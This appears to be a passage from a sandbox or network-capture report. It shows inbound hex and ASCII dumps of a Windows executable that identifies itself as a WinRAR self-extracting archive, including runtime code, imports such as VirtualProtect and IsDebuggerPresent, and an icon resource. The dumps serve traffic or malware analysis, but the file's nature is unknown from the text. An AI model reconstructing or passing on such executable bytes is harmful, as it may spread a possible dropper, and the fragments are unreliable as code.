2021-10-13 07:59:22 UTC	109	IN	Data Raw: 8c 00 00 83 c4 10 66 89 6c 7e 02 33 c0 66 89 2e 66 89 44 7e 04 ff 74 24 18 56 53 e8 31 39 ff ff 56 e8 85 19 00 00 59 5f 5e 5d 8b c3 5b c2 08 00 83 ec 5c 53 55 56 57 e8 ec e1 ff ff 6a 68 ff 35 c8 75 44 00 ff 15 e0 df 43 00 8b 3d 7c df 43 00 33 db 8b f0 bd c2 00 00 00 38 1d d6 75 44 00 75 30 8b 0d e8 75 44 00 e8 9d c3 ff ff 6a 05 56 ff 15 e8 df 43 00 6a ff 53 68 b1 00 00 00 56 ff d7 68 e4 22 43 00 53 55 56 ff d7 c6 05 d6 75 44 00 01 b8 00 e1 f5 05 50 50 68 b1 00 00 00 56 ff d7 8d 44 24 10 c7 44 24 10 5c 00 00 00 50 53 68 3a 04 00 00 56 ff d7 33 c9 88 5c 24 29 8a 5c 24 70 41 89 4c 24 14 84 db 74 1f 8b 44 24 18 25 ff ff ff bf c7 44 24 24 a0 00 00 00 0b c1 c7 44 24 14 01 00 00 40 89 44 24 18 8d 44 24 10 50 51 68 44 04 00 00 56 ff d7 ff 74 24 74 6a 00 55 56 ff Data Ascii: fl~3f.fD~t$VS19VY_^][\SUVWjh5uDC=\|C38uDu0uDjVCjShVh"CSUVuDPPhVD$D$\PSh:V3\$)\$pAL$tD$%D$$D$@D$D$PQhDVt$tjUV
2021-10-13 07:59:22 UTC	117	IN	Data Raw: 02 fb ff ff 59 84 c0 75 07 6a 07 e8 45 04 00 00 32 db 88 5d e7 83 65 fc 00 e8 b3 fa ff ff 88 45 dc a1 7c fe 45 00 33 c9 41 3b c1 74 dc 85 c0 75 49 89 0d 7c fe 45 00 68 b4 22 43 00 68 98 22 43 00 e8 df 96 00 00 59 59 85 c0 74 11 c7 45 fc fe ff ff ff b8 ff 00 00 00 e9 f6 00 00 00 68 94 22 43 00 68 64 22 43 00 e8 5d 96 00 00 59 59 c7 05 7c fe 45 00 02 00 00 00 eb 05 8a d9 88 5d e7 ff 75 dc e8 d9 fb ff ff 59 e8 6c 06 00 00 8b f0 33 ff 39 3e 74 1a 56 e8 3b fb ff ff 59 84 c0 74 0f 57 6a 02 57 8b 36 8b ce e8 90 01 00 00 ff d6 e8 4b 06 00 00 8b f0 39 3e 74 13 56 e8 16 fb ff ff 59 84 c0 74 08 ff 36 e8 b9 8a 00 00 59 e8 9e 04 00 00 0f b7 c0 50 e8 9b 95 00 00 50 57 68 00 00 40 00 e8 31 ea ff ff 8b f0 e8 a6 89 00 00 84 c0 75 06 56 e8 c5 8a 00 00 84 db 75 05 e8 5f 8a Data Ascii: YujE2]eE\|E3A;tuI\|Eh"Ch"CYYtEh"Chd"C]YY\|E]uYl39>tV;YtWjW6K9>tVYt6YPPWh@1uVu_
2021-10-13 07:59:22 UTC	125	IN	Data Raw: 8d 0c 4d ff ff ff ff 85 c9 0f 85 e7 fc ff ff 0f b6 7e f8 0f b6 42 f8 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 c5 fc ff ff 0f b6 7e f9 0f b6 42 f9 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 a3 fc ff ff 0f b6 4e fa 0f b6 42 fa 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 7d fc ff ff 8b 46 fb 3b 42 fb 0f 84 81 00 00 00 0f b6 f8 0f b6 42 fb 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 50 fc ff ff 0f b6 7e fc 0f b6 42 fc 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 2e fc ff ff 0f b6 7e fd 0f b6 42 fd 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 0c fc ff ff 0f b6 4e fe 0f b6 42 fe 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c Data Ascii: M~B+t3M~B+t3MNB+t3E3}F;BB+t3MP~B+t3M.~B+t3MNB+t3
2021-10-13 07:59:22 UTC	133	IN	Data Raw: 83 7b 0c 00 0f 84 a1 00 00 00 8d 45 fc 50 8d 45 f8 50 ff 75 1c ff 75 20 53 e8 f3 d1 ff ff 8b 4d f8 83 c4 14 8b 55 fc 3b ca 73 79 8d 70 0c 8b 45 1c 3b 46 f4 7c 63 3b 46 f8 7f 5e 8b 06 8b 7e 04 c1 e0 04 8b 7c 07 f4 85 ff 74 13 8b 56 04 8b 5c 02 f4 8b 55 fc 80 7b 08 00 8b 5d 18 75 38 8b 7e 04 83 c7 f0 03 c7 8b 7d 08 f6 00 40 75 28 6a 01 ff 75 24 8d 4e f4 ff 75 20 51 6a 00 50 53 ff 75 14 ff 75 10 ff 75 0c 57 e8 dc fa ff ff 8b 55 fc 83 c4 2c 8b 4d f8 8b 45 1c 41 83 c6 14 89 4d f8 3b ca 72 8d 5e 5b 5f 8b e5 5d c3 e8 29 48 00 00 cc 55 8b ec 83 ec 18 53 56 8b 75 0c 57 85 f6 0f 84 82 00 00 00 8b 3e 33 db 85 ff 7e 71 8b 45 08 8b d3 89 5d fc 8b 40 1c 8b 40 0c 8b 08 83 c0 04 89 4d f0 89 45 e8 8b c8 8b 45 f0 89 4d f4 89 45 f8 85 c0 7e 3b 8b 46 04 03 c2 89 45 ec 8b 55 Data Ascii: {EPEPuu SMU;sypE;F\|c;F^~\|tV\U{]u8~}@u(ju$Nu QjPSuuuWU,MEAM;r^[_])HUSVuW>3~qE]@@MEEME~;FEU
2021-10-13 07:59:22 UTC	141	IN	Data Raw: 18 50 53 8d 86 48 04 00 00 6a 20 50 e8 13 f3 ff ff 83 c4 10 ff 76 0c 8d 46 18 50 57 8d 45 fc 8d 8e 48 04 00 00 50 e8 18 0d 00 00 8b 4e 20 8d 7e 18 8b c1 c1 e8 03 a8 01 74 1b c1 e9 02 f6 c1 01 75 13 57 53 8d 86 48 04 00 00 6a 30 50 e8 d2 f2 ff ff 83 c4 10 6a 00 8b ce e8 b3 0b 00 00 83 3f 00 7c 1d 8b 46 20 c1 e8 02 a8 01 74 13 57 53 8d 86 48 04 00 00 6a 20 50 e8 a7 f2 ff ff 83 c4 10 b0 01 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 0c a1 68 d6 43 00 33 c5 89 45 fc 53 56 8b f1 33 db 6a 41 5a 6a 58 0f b7 46 32 59 83 f8 64 7f 6b 0f 84 92 00 00 00 3b c1 7f 3e 74 36 3b c2 0f 84 94 00 00 00 83 f8 43 74 3f 83 f8 44 7e 1d 83 f8 47 0f 8e 81 00 00 00 83 f8 53 75 0f 8b ce e8 d8 09 00 00 84 c0 0f 85 a0 00 00 00 32 c0 e9 e4 01 00 00 6a 01 6a 10 eb 57 83 e8 5a 74 15 83 e8 Data Ascii: PSHj PvFPWEHPN ~tuWSHj0Pj?\|F tWSHj P_^[]UhC3ESV3jAZjXF2Ydk;>t6;Ct?D~GSu2jjWZt
2021-10-13 07:59:22 UTC	148	IN	Data Raw: fb 2b 75 0e 8b 75 0c 8a 1e 46 88 5d fc 89 75 0c eb 03 8b 75 0c 85 ff 74 05 83 ff 10 75 78 8a c3 2c 30 3c 09 77 08 0f be c3 83 c0 d0 eb 23 8a c3 2c 61 3c 19 77 08 0f be c3 83 c0 a9 eb 13 8a c3 2c 41 3c 19 77 08 0f be c3 83 c0 c9 eb 03 83 c8 ff 85 c0 74 09 85 ff 75 3d 6a 0a 5f eb 38 8a 06 46 88 45 f0 89 75 0c 3c 78 74 1b 3c 58 74 17 85 ff 75 03 6a 08 5f ff 75 f0 8d 4d 0c e8 ed 07 00 00 8b 75 0c eb 10 85 ff 75 03 6a 10 5f 8a 1e 46 88 5d fc 89 75 0c 33 d2 83 c8 ff f7 f7 89 55 ec 8b 55 f8 89 45 f0 8d 4b d0 80 f9 09 77 08 0f be cb 83 c1 d0 eb 23 8a c3 2c 61 3c 19 77 08 0f be cb 83 c1 a9 eb 13 8a c3 2c 41 3c 19 77 08 0f be cb 83 c1 c9 eb 03 83 c9 ff 83 f9 ff 74 30 3b cf 73 2c 8b 45 f4 83 ca 08 8b 5d f0 3b c3 72 0c 75 05 3b 4d ec 76 05 83 ca 04 eb 08 0f af c7 03 Data Ascii: +uuF]uutux,0<w#,a<w,A<wtu=j_8FEu<xt<Xtuj_uMuuj_F]u3UUEKw#,a<w,A<wt0;s,E];ru;Mv
2021-10-13 07:59:22 UTC	156	IN	Data Raw: 00 8b f8 ff 15 b4 21 43 00 8d 85 d8 fc ff ff 50 ff 15 b0 21 43 00 85 c0 75 13 85 ff 75 0f 83 7d 08 ff 74 09 ff 75 08 e8 84 69 ff ff 59 8b 4d fc 33 cd 5f e8 eb 64 ff ff 8b e5 5d c3 8b ff 55 8b ec ff 75 08 b9 00 04 46 00 e8 f0 e9 ff ff 5d c3 8b ff 55 8b ec 51 a1 68 d6 43 00 33 c5 89 45 fc 56 e8 54 08 00 00 85 c0 74 35 8b b0 5c 03 00 00 85 f6 74 2b ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 8b ce ff 15 60 22 43 00 ff d6 8b 4d fc 83 c4 14 33 cd 5e e8 88 64 ff ff 8b e5 5d c3 ff 75 18 8b 35 68 d6 43 00 8b ce ff 75 14 33 35 00 04 46 00 83 e1 1f ff 75 10 d3 ce ff 75 0c ff 75 08 85 f6 75 be e8 11 00 00 00 cc 33 c0 50 50 50 50 50 e8 79 ff ff ff 83 c4 14 c3 6a 17 e8 90 8e 00 00 85 c0 74 05 6a 05 59 cd 29 56 6a 01 be 17 04 00 c0 56 6a 02 e8 06 fe ff ff 83 c4 0c 56 Data Ascii: !CP!Cuu}tuiYM3_d]UuF]UQhC3EVTt5\t+uuuuu`"CM3^d]u5hCu35Fuuuu3PPPPPyjtjY)VjVjV
2021-10-13 07:59:22 UTC	164	IN	Data Raw: 43 00 6a 14 e8 67 fd ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 60 22 43 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 d8 21 43 00 8b 4d fc 33 cd 5e e8 a5 45 ff ff 8b e5 5d c2 0c 00 8b ff 55 8b ec 51 a1 68 d6 43 00 33 c5 89 45 fc 56 68 8c 60 43 00 68 84 60 43 00 68 8c 60 43 00 6a 16 e8 05 fd ff ff 8b f0 83 c4 10 85 f6 74 27 ff 75 28 8b ce ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 60 22 43 00 ff d6 eb 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c 6a 00 ff 75 08 e8 18 00 00 00 50 ff 15 10 22 43 00 8b 4d fc 33 cd 5e e8 1d 45 ff ff 8b e5 5d c2 24 00 8b ff 55 8b ec 51 a1 68 d6 43 00 33 c5 89 45 fc 56 68 a4 60 43 00 68 9c 60 43 00 68 a4 60 43 00 6a 18 e8 7d fc ff ff 8b f0 83 c4 10 85 f6 74 12 ff 75 0c Data Ascii: Cjgtuuu`"Cuu!CM3^E]UQhC3EVh`Ch`Ch`Cjt'u(u$u uuuuuu`"C uuuuujuP"CM3^E]$UQhC3EVh`Ch`Ch`Cj}tu
2021-10-13 07:59:22 UTC	172	IN	Data Raw: fc 33 c9 8b d1 57 bf 00 00 08 00 a8 3f 74 29 a8 01 74 03 6a 10 5a a8 04 74 03 83 ca 08 a8 08 74 03 83 ca 04 a8 10 74 03 83 ca 02 a8 20 74 03 83 ca 01 a8 02 74 02 0b d7 0f ae 5d f8 8b 45 f8 83 e0 c0 89 45 f4 0f ae 55 f4 8b 45 f8 a8 3f 74 29 a8 01 74 03 6a 10 59 a8 04 74 03 83 c9 08 a8 08 74 03 83 c9 04 a8 10 74 03 83 c9 02 a8 20 74 03 83 c9 01 a8 02 74 02 0b cf 0b ca 8b c1 5f eb 3d 66 8b 4d fc 33 c0 f6 c1 3f 74 32 f6 c1 01 74 03 6a 10 58 f6 c1 04 74 03 83 c8 08 f6 c1 08 74 03 83 c8 04 f6 c1 10 74 03 83 c8 02 f6 c1 20 74 03 83 c8 01 f6 c1 02 74 05 0d 00 00 08 00 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 9b d9 7d f8 66 8b 45 f8 33 c9 a8 01 74 03 6a 10 59 a8 04 74 03 83 c9 08 a8 08 74 03 83 c9 04 a8 10 74 03 83 c9 02 a8 20 74 03 83 c9 01 a8 02 74 06 81 c9 00 00 08 Data Ascii: 3W?t)tjZttt tt]EEUE?t)tjYttt tt_=fM3?t2tjXttt tt]U}fE3tjYttt tt
2021-10-13 07:59:22 UTC	180	IN	Data Raw: 00 00 8b 47 0c c1 e8 0d a8 01 74 32 83 fb 01 75 11 57 e8 49 ff ff ff 59 83 f8 ff 74 21 ff 45 e4 eb 1c 85 db 75 18 8b 47 0c d1 e8 a8 01 74 0f 57 e8 2b ff ff ff 59 83 f8 ff 75 03 09 45 dc 83 65 fc 00 e8 0e 00 00 00 8b 45 d4 83 c6 04 eb 95 8b 5d 08 8b 75 e0 ff 75 d8 e8 25 b7 ff ff 59 c3 c7 45 fc fe ff ff ff e8 14 00 00 00 83 fb 01 8b 45 e4 74 03 8b 45 dc e8 1b 08 ff ff c3 8b 5d 08 6a 08 e8 53 be ff ff 59 c3 8b ff 55 8b ec 56 8b 75 08 57 8d 7e 0c 8b 07 c1 e8 0d a8 01 74 24 8b 07 c1 e8 06 a8 01 74 1b ff 76 04 e8 01 9f ff ff 59 b8 bf fe ff ff f0 21 07 33 c0 89 46 04 89 06 89 46 08 5f 5e 5d c3 8b ff 55 8b ec 8b 4d 08 83 f9 fe 75 0d e8 54 a3 ff ff c7 00 09 00 00 00 eb 38 85 c9 78 24 3b 0d 20 06 46 00 73 1c 8b c1 83 e1 3f c1 f8 06 6b c9 30 8b 04 85 20 04 46 00 0f Data Ascii: Gt2uWIYt!EuGtW+YuEeE]uu%YEEtE]jSYUVuW~t$tvY!3FF_^]UMuT8x$; Fs?k0 F
2021-10-13 07:59:22 UTC	188	IN	Data Raw: ff ff 00 9b 8a 8d 61 ff ff ff d0 e1 d0 f9 d0 c1 8a c1 24 0f d7 0f be c0 81 e1 04 04 00 00 8b da 03 d8 83 c3 10 ff 23 80 7a 0e 05 75 11 66 8b 9d 5c ff ff ff 80 cf 02 80 e7 fe b3 3f eb 04 66 bb 3f 13 66 89 9d 5e ff ff ff d9 ad 5e ff ff ff bb 5e 8d 43 00 d9 e5 89 95 6c ff ff ff 9b dd bd 60 ff ff ff c6 85 70 ff ff ff 00 d9 c9 8a 8d 61 ff ff ff d9 e5 9b dd bd 60 ff ff ff d9 c9 8a ad 61 ff ff ff d0 e5 d0 fd d0 c5 8a c5 24 0f d7 8a e0 d0 e1 d0 f9 d0 c1 8a c1 24 0f d7 d0 e4 d0 e4 0a c4 0f be c0 81 e1 04 04 00 00 8b da 03 d8 83 c3 10 ff 23 e8 ce 00 00 00 d9 c9 dd d8 c3 e8 c4 00 00 00 eb f6 dd d8 dd d8 d9 ee c3 dd d8 dd d8 d9 ee 84 ed 74 02 d9 e0 c3 dd d8 dd d8 d9 e8 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 08 c6 85 70 ff ff ff 00 c3 c6 85 70 Data Ascii: a$#zuf\?f?f^^^Cl`pa`a$$#tbbi@tpp
2021-10-13 07:59:22 UTC	195	IN	Data Raw: 77 00 65 00 64 00 20 00 61 00 72 00 72 00 61 00 79 00 20 00 73 00 69 00 7a 00 65 00 20 00 28 00 25 00 75 00 29 00 20 00 69 00 73 00 20 00 65 00 78 00 63 00 65 00 65 00 64 00 65 00 64 00 00 00 43 00 4d 00 54 00 00 00 52 00 52 00 00 00 00 00 68 00 25 00 75 00 00 00 68 00 63 00 25 00 75 00 00 00 00 00 78 00 25 00 75 00 00 00 78 00 63 00 25 00 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 25 00 75 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 0e 0a 04 08 09 0f 0d 06 01 0c 00 02 0b 07 05 03 0b 08 0c 00 05 02 0f 0d 0a 0e 03 06 07 01 09 04 07 09 03 01 0d 0c 0b 0e 02 06 05 0a 04 00 0f 08 09 00 05 07 02 04 0a 0f 0e 01 0b 0c 06 08 03 0d 02 0c 06 0a 00 0b 08 03 04 0d 07 05 0f 0e 01 09 0c 05 01 0f 0e 0d 04 0a 00 07 06 03 09 02 08 Data Ascii: wed array size (%u) is exceededCMTRRh%uhc%ux%uxc%u;%u
2021-10-13 07:59:22 UTC	203	IN	Data Raw: 60 22 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 6c 98 43 00 5c 18 41 00 c3 80 41 00 b4 98 43 00 5c 18 41 00 c3 80 41 00 00 99 43 00 71 e2 41 00 c3 80 41 00 62 61 64 20 61 72 72 61 79 20 6e 65 77 20 6c 65 6e 67 74 68 00 00 00 00 c0 fe 45 00 10 ff 45 00 63 73 6d e0 01 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 20 05 93 19 00 00 00 00 00 00 00 00 cc 17 42 00 50 99 43 00 71 e2 41 00 c3 80 41 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 08 43 43 00 1c 43 43 00 58 43 43 00 90 28 43 00 61 00 64 00 76 00 61 00 70 00 69 00 33 00 32 00 00 00 00 00 3c 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 66 00 69 00 62 00 65 00 72 00 73 00 2d 00 6c 00 31 00 2d 00 31 00 2d 00 31 00 00 00 3c 00 70 00 69 00 2d Data Ascii: `"ClC\AAC\AACqAAbad array new lengthEEcsm BPCqAAbad exceptionCCCCXCC(Cadvapi32<pi-ms-win-core-fibers-l1-1-1<pi-
2021-10-13 07:59:22 UTC	211	IN	Data Raw: 32 1f 39 2e 03 02 45 5a 25 f8 d2 71 56 4a c2 c3 da 07 00 00 10 8f 2e a8 08 43 b2 aa 7c 1a 21 8e 40 ce 8a f3 0b ce c4 84 27 0b eb 7c c3 94 25 ad 49 12 00 00 00 40 1a dd da 54 9f cc bf 61 59 dc ab ab 5c c7 0c 44 05 f5 67 16 bc d1 52 af b7 fb 29 8d 8f 60 94 2a 00 00 00 00 00 21 0c 8a bb 17 a4 8e af 56 a9 9f 47 06 36 b2 4b 5d e0 5f dc 80 0a aa fe f0 40 d9 8e a8 d0 80 1a 6b 23 63 00 00 64 38 4c 32 96 c7 57 83 d5 42 4a e4 61 22 a9 d9 3d 10 3c bd 72 f3 e5 91 74 15 59 c0 0d a6 1d ec 6c d9 2a 10 d3 e6 00 00 00 10 85 1e 5b 61 4f 6e 69 2a 7b 18 1c e2 50 04 2b 34 dd 2f ee 27 50 63 99 71 c9 a6 16 e9 4a 8e 28 2e 08 17 6f 6e 49 1a 6e 19 02 00 00 00 40 32 26 40 ad 04 50 72 1e f9 d5 d1 94 29 bb cd 5b 66 96 2e 3b a2 db 7d fa 65 ac 53 de 77 9b a2 20 b0 53 f9 bf c6 ab 25 94 Data Ascii: 29.EZ%qVJ.C\|!@'\|%I@TaY\DgR)`!VG6K]_@k#cd8L2WBJa"=<rtYl[aOni*{P+4/'PcqJ(.onIn@2&@Pr)[f.;}eSw S%
2021-10-13 07:59:22 UTC	219	IN	Data Raw: 7c 88 43 00 8d 00 00 00 b8 73 43 00 36 00 00 00 88 88 43 00 7e 00 00 00 b0 72 43 00 14 00 00 00 94 88 43 00 56 00 00 00 b8 72 43 00 15 00 00 00 a0 88 43 00 57 00 00 00 ac 88 43 00 98 00 00 00 b8 88 43 00 8c 00 00 00 c8 88 43 00 9f 00 00 00 d8 88 43 00 a8 00 00 00 c0 72 43 00 16 00 00 00 e8 88 43 00 58 00 00 00 c8 72 43 00 17 00 00 00 f4 88 43 00 59 00 00 00 e8 73 43 00 3c 00 00 00 00 89 43 00 85 00 00 00 0c 89 43 00 a7 00 00 00 18 89 43 00 76 00 00 00 24 89 43 00 9c 00 00 00 d8 72 43 00 19 00 00 00 30 89 43 00 5b 00 00 00 18 73 43 00 22 00 00 00 3c 89 43 00 64 00 00 00 48 89 43 00 be 00 00 00 58 89 43 00 c3 00 00 00 68 89 43 00 b0 00 00 00 78 89 43 00 b8 00 00 00 88 89 43 00 cb 00 00 00 98 89 43 00 c7 00 00 00 e0 72 43 00 1a 00 00 00 a8 89 43 00 5c 00 00 Data Ascii: \|CsC6C~rCCVrCCWCCCCrCCXrCCYsC<CCCv$CrC0C[sC"<CdHCXChCxCCCrCC\
2021-10-13 07:59:22 UTC	227	IN	Data Raw: 08 a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c a0 43 00 01 00 00 00 54 a0 43 00 01 00 00 00 d0 dd 43 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 00 00 00 00 ff ff ff ff 77 12 43 00 ff ff ff ff 82 12 43 00 01 00 00 00 8d 12 43 00 22 05 93 19 03 00 00 00 70 a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 5a 12 43 00 00 00 00 00 62 12 43 00 22 05 93 19 02 00 00 00 ac a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c7 12 43 00 22 05 93 19 01 00 00 00 e0 a0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff fc 12 43 00 00 00 00 00 07 13 43 00 22 05 93 Data Ascii: CLCTCCwCCC"pCZCbC"CC"CCC"
2021-10-13 07:59:22 UTC	234	IN	Data Raw: 52 00 47 64 69 70 43 72 65 61 74 65 42 69 74 6d 61 70 46 72 6f 6d 53 74 72 65 61 6d 49 43 4d 00 5f 00 47 64 69 70 43 72 65 61 74 65 48 42 49 54 4d 41 50 46 72 6f 6d 42 69 74 6d 61 70 00 75 02 47 64 69 70 6c 75 73 53 74 61 72 74 75 70 00 00 74 02 47 64 69 70 6c 75 73 53 68 75 74 64 6f 77 6e 00 67 64 69 70 6c 75 73 2e 64 6c 6c 00 b1 03 52 61 69 73 65 45 78 63 65 70 74 69 6f 6e 00 00 73 02 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 ef 04 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 00 00 f1 04 56 69 72 74 75 61 6c 51 75 65 72 79 00 00 3d 03 4c 6f 61 64 4c 69 62 72 61 72 79 45 78 41 00 00 04 03 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 00 03 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6e 74 00 d3 04 55 6e 68 61 6e 64 6c 65 64 Data Ascii: RGdipCreateBitmapFromStreamICM_GdipCreateHBITMAPFromBitmapuGdiplusStartuptGdiplusShutdowngdiplus.dllRaiseExceptionsGetSystemInfoVirtualProtectVirtualQuery=LoadLibraryExAIsProcessorFeaturePresentIsDebuggerPresentUnhandled
2021-10-13 07:59:22 UTC	242	IN	Data Raw: 1b bf fa e2 cb de fb bf a1 d3 b3 56 f8 51 76 f7 63 71 74 dc 12 5e 10 47 c7 d9 dd 8f 57 8f 8b 38 3a 6e 83 a5 3c 63 35 e6 df c9 14 17 f9 cf 7f b5 70 35 31 7f 2a 53 de a5 b3 b3 16 e2 22 ee 3f e0 3c a0 6a 8c 46 1c d7 55 8d f1 78 d5 b8 8c c3 04 d6 ad bd fc 6f d0 ff ef cf 7f 76 ef d7 bf b4 3c 7f f5 8b 93 9f fe 64 2c 65 8b f5 97 b9 e3 fe 8f 7f 34 4a 53 fb fa 08 e2 a3 c3 c3 87 2f 3c 7f 8d 21 b7 96 77 47 69 ea f0 c7 8b 9c f3 69 d6 19 18 97 76 e3 e2 92 77 dd aa d3 2e ff 35 db 4b 78 71 dd d8 e1 53 11 b0 23 55 d7 a7 19 16 e6 17 5e a7 19 17 8e 5f 98 5f 38 7e 69 eb bf 0e 55 c7 64 5c 98 77 99 77 39 7e 61 5c 98 5f 98 5f 38 7e 61 7e e1 b8 8e f9 85 e3 97 96 f9 d1 78 e4 ee b7 f1 f1 63 5f 71 51 5f 7d e5 ea a7 47 a3 e8 eb af 1d e3 32 1e 37 9f 73 47 7e fb 77 f9 dd 3b c9 df 3e Data Ascii: VQvcqt^GW8:n<c5p51*S"?<jFUxov<d,e4JS/<!wGiivw.5KxqS#U^__8~iUd\ww9~a\__8~a~xc_qQ_}G27sG~w;>
2021-10-13 07:59:22 UTC	250	IN	Data Raw: b8 10 5c 88 e0 42 70 21 b8 10 5c 08 2e 04 17 22 b8 10 5c 08 2e 04 17 82 0b c1 85 08 2e 14 a0 ff 03 66 99 e7 1a d9 b9 6c d7 00 00 00 00 49 45 4e 44 ae 42 60 82 50 41 44 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8e fe f6 fe fe 6e fe f6 00 00 00 00 00 00 00 00 8f ef e6 ef ef 6f ef e6 60 00 00 00 00 00 00 00 8e fe f6 fe fe 6e fe f6 60 00 00 00 00 00 00 00 8f ef e6 ef ef 6f ef e6 60 60 00 00 00 00 00 00 86 66 66 66 66 0f ff f6 60 60 00 00 00 00 00 Data Ascii: \Bp!\."\..flIENDB`PAD( @no`n`o``ffff``
2021-10-13 07:59:22 UTC	258	IN	Data Raw: 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 0d 0a 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 0d 0a 20 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 2a 22 0d 0a 20 20 6e 61 6d 65 3d 22 57 69 6e 52 41 52 20 53 46 58 22 0d 0a 20 20 74 79 70 65 3d 22 77 69 6e 33 32 22 2f 3e 0d 0a 3c 64 65 73 63 72 69 70 74 69 6f 6e 3e 57 69 6e 52 41 52 20 53 46 58 20 6d 6f 64 75 6c 65 3c 2f 64 65 73 63 72 69 70 74 69 6f 6e 3e 0d 0a 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 Data Ascii: n:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="WinRAR SFX" type="win32"/><description>WinRAR SFX module</description><trustInfo xmlns="urn:schemas-microsoft-com:a
2021-10-13 07:59:22 UTC	266	IN	Data Raw: 6e 35 78 35 00 20 03 00 50 00 00 00 60 32 68 32 6c 32 70 32 74 32 78 32 7c 32 80 32 84 32 88 32 8c 32 90 32 9c 32 a0 32 a4 32 a8 32 ac 32 b0 32 bc 32 c0 32 c4 32 e8 32 ec 32 f0 32 f4 32 f8 32 fc 32 00 33 5c 35 60 35 64 35 68 35 6c 35 70 35 74 35 00 00 00 30 03 00 9c 00 00 00 98 30 9c 30 a0 30 a4 30 a8 30 ac 30 b0 30 b4 30 b8 30 bc 30 c0 30 c4 30 c8 30 cc 30 d0 30 d4 30 d8 30 dc 30 e0 30 e4 30 e8 30 ec 30 f0 30 f4 30 f8 30 fc 30 00 31 04 31 08 31 0c 31 10 31 14 31 18 31 1c 31 20 31 24 31 28 31 2c 31 30 31 34 31 38 31 3c 31 40 31 44 31 48 31 4c 31 50 31 54 31 58 31 5c 31 60 31 64 31 68 31 6c 31 70 31 74 31 78 31 7c 31 80 31 84 31 88 31 8c 31 90 31 94 31 98 31 9c 31 a0 31 a4 31 a8 31 ac 31 b0 31 98 33 9c 33 00 00 00 40 03 00 30 01 00 00 10 32 14 32 54 32 58 Data Ascii: n5x5 P`2h2l2p2t2x2\|2222222222222222222223\5`5d5h5l5p5t500000000000000000000000000011111111 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1\|1111111111111133@022T2X
